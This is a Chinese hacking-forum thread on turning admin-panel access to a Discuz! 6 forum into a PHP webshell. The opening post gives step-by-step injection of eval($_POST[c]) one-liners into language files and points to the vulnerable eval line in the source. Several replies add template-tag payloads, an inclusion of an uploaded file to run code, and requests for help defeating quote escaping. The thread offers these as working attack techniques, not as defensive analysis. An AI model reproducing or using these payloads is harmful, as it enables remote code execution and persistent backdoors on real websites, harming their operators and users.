[原创]Discuz! 6 后台拿Shell的方法
文章作者:Ryat (lib3r3t)信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
[b]注:文章首发狼族([url]www.wolvez.org[/url]),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。[/b]
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)
1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
[code]eval($_POST[c]);[/code]
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
[code]";eval($_POST[c]);"[/code]
在前台回帖处选择引用回复。
简单看下代码:
include/newreply.inc.php 107行:
[code]eval("\$language['post_reply_quote'] = \"$language[post_reply_quote]\";");[/code]
呵呵,一个天然的后门:)
PS:还有几个编辑模板的地方可以利用,和第二种方法类似。 [s:270]
貌似
编辑
模板
要
论坛
创始人
权限//
我x 所有模板文件, html 文件内都能够起到getwebshell的作用.
有点PHP常识的人都能够看出那里的端倪.
楼主的方法没什么讨论价值 #2
我没说这个有多大的讨论价值,话说这坛子我也没见过几个有价值的东西(我指PHP方面的)...
而且这年头没PHP常识的人还是有的...
PS:谁有权限把我这发帖数改了,我就发过5个贴,X... [quote]引用第4楼remax于2008-01-27 18:33发表的 :
讲出来[/quote]
{eval eval($_GET[a])}
鄙视某些只会装B的人 哎,基本上来邪八进行讨论的人,都不是那些天天嚷嚷着怎么刷QB,怎么盗QQ的人了。。或者其他XX。。。
至少都是有一点基础的。。像这种文章本来就没什么价值。。。你要说它有价值,那么你还是发到那些XX动画吧,XX基地去吧,,。。。如果来这的人连这些都不会的话,那么整个论坛我看他大多都看不懂!也就没有来这的意义鸟。。。 [s:265] 任意html模板文件插入
<!--{php script}--> 就可以getwebshell。
<!--{phpinfo()}-->
数据库->资料恢复 那里有个函数未做很深的判断也可以用来getwebshell.
没有[b]创始人权限[/b]也是可以getwebshell的. 不便说出来. (如果你认为是装B,那就姑且这么认为吧) [quote]引用第7楼ring04h于2008-01-27 21:32发表的 :
任意html模板文件插入
<!--{php script}--> 就可以getwebshell。
<!--{phpinfo()}-->
数据库->资料恢复 那里有个函数未做很深的判断也可以用来getwebshell.
.......[/quote]
越来越有意思了...
我也知道一种不需创始人权限的方法,还是通过缓存,还是和模板有关,
里面涉及个技巧,确实不方便说,
不知道和你的方法一样不,哈哈... 缓存那就可以的.先编辑一下XXX模板..然后更新。。。不需要创始人权限嘛。如果是创始人权限。那方法太多了。。没讨论价值。比如INCLUDE 啦。本地或者远程包啦。拆分字符串饶过过滤啦。。多啦 [quote]引用第12楼heiye88于2008-01-30 09:24发表的 :
缓存那就可以的.先编辑一下XXX模板..然后更新。。。不需要创始人权限嘛。如果是创始人权限。那方法太多了。。没讨论价值。比如INCLUDE 啦。本地或者远程包啦。拆分字符串饶过过滤啦。。多啦[/quote]
一大早起来就看到这么牛的回复...
我没LS牛,我的方法不是编辑模板后更新缓存(虽然和模板和缓存有关),貌似非创始人没法编辑模板吧...
如果有创始人权限,本地或远程包含到是有可能触发,但是要通过某个东西转换下,拆分字符串饶过过滤?没明白?怎么个拆分?绕过哪的过滤啊?
PS:这邪八的牛人咋就这么多呢?不爽啊... lz
如果管理员把板块编辑的删了,哪你们上面的方法还有哪个能用? [quote]原帖由 [i]ring04h[/i] 于 2008-1-27 21:32 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=108344&ptid=32042][img]images/common/back.gif[/img][/url]
任意html模板文件插入
就可以getwebshell。
数据库->资料恢复 那里有个函数未做很深的判断也可以用来getwebshell.
没有创始人权限也是可以getwebshell的. 不便说出来. (如果你认为是装B,那就姑且这么认为吧) ... [/quote]
请问
<!--{php script}-->
<!--{phpinfo()}-->
怎么用这个拿WEBSHELL! <!--{eval($_POST[c]);}-->
楼上不知道懂不懂PHP。 <!--{eval include("上传图片地址");}--> // 包含附件 能不能进后台可是一个大问题! Discuz! 5.5.0 后台如何拿webshell ? 前提是要进入后台啊!! 以后试试看有谁密码都没改让我进去!! 呵呵 我的论坛后台的在线编辑就是 打开的了 ~
呵呵 但是 后台 还是有提示 要我 关闭~ :sweat: 老帖都被你给顶上来了。。 有关discuz字符拆分的方法
在discuz中插入 代码的时候。。遇到了 ‘ 把'解析成\' 了,,无法插入,,请朋友帮帮,
例如 id='数据'
我的要插入的数据是 eval($_POST[cmd])
为了 达到闭合,,该怎么操作,,怎么拆分 绕过这个过滤的,我试好多不行,, 如果管理员把板块编辑的删了,哪你们上面的方法还有哪个能用?
好像也是这样~~
[[i] 本帖最后由 炼域人生 于 2008-11-11 14:37 编辑 [/i]]
dz6.1后台
研究了一个晚上,就是不能插入一句话,闭合不了.谁能提供一下思路啊.大NIU们.页:
[1]